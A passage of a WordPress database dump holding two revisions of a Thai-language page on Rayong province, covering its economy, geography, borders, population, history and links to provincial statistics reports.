(5205, 3, '2019-02-20 10:48:22', '2019-02-20 03:48:22', '<img class=\"aligncenter wp-image-822 size-large\" src=\"/wp-content/uploads/2018/01/GPP55-1024x648.jpg\" alt=\"\" width=\"640\" height=\"405\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></span></h4>\r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></span></h4>\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></span>\r\n\r\n<span style=\"color: #ff00ff; font-size: medium;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></span></div>\r\n<div class=\"article-rel-wrapper\">\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></span></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2019-02-20 10:48:22', '2019-02-20 03:48:22', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(5206, 3, '2019-02-20 11:24:42', '2019-02-20 04:24:42', '<h2 class=\"componentheading\">ประวัติความเป็นมาของจังหวัดระยอง</h2>\r\n<div>\r\n\r\n ระยอง เริ่มปรากฎชื่อในพงศาวดารเมื่อปี พ.ศ.2113 ในรัชสมัยของสมเด็จพระมหาธรรมราชาแห่งกรุงศรีอยุธยา โดยมีประวัติดั้งเดิมตามข้อสันนิษฐานว่า น่าจะก่อตั้งเมืองขึ้นเมื่อประมาณ พ.ศ. 1500 ยุคที่ขอมมีอานุภาพเฟื่องฟูแถบดินแดนสุวรรณภูมิ นักโบราณคดีได้สันนิษฐานจากหลักฐานที่พบ คือ ซากศิลาแลงคูค่ายที่ยังหลงเหลืออยู่ในเขตอำเภอบ้านค่าย อันเป็นศิลปะการก่อสร้างแบบขอม โดยในสมัยโบราณ ระยองมีชนพื้นเมืองคือชาวซอง ซึ่งเป็นเผ่าที่อาศัยอยู่กระจายโดยทั่วไปในภาคตะวันออก ในประวัติศาสตร์ตอนหนึ่งได้กล่าวถึงเมืองระยองในปลายสมัยกรุงศรีอยุธยา ระหว่างที่กรุงศรีอยุธยาใกล้จะเสียแก่พม่าเป็นครั้งที่ 2 ในสมัยพระเจ้าเอกทัศน์ ในเดือนยี่ปี พ.ศ.2309 พระยาวชิรปราการ หรือ พระยาตาก พร้อมไพร่พลประมาณ 500 คน ได้ตีฝ่าวงล้อมทัพพม่า มุ่งสู่ตะวันออกมาหยุดพักไพร่พลที่เมืองระยอง และได้ปราบปรามคณะกรรมการเมืองที่แข็งข้อยึดเมืองระยองได้ จากความสามารถครั้งนั้น เหล่าทหารจึงยกย่องให้เป็น \"เจ้าตากสิน\" ก่อนเดินทัพไปยังเมืองจันทบุรี เพื่อยึดที่ดินในการกอบกู้อิสรภาพคืนจากพม่าได้ในปี พ.ศ.2113\r\n\r\n \r\n\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></span></h4>\r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></span></h4>\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></span>\r\n\r\n<span style=\"color: #ff00ff; font-size: medium;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></span></div>\r\n<div 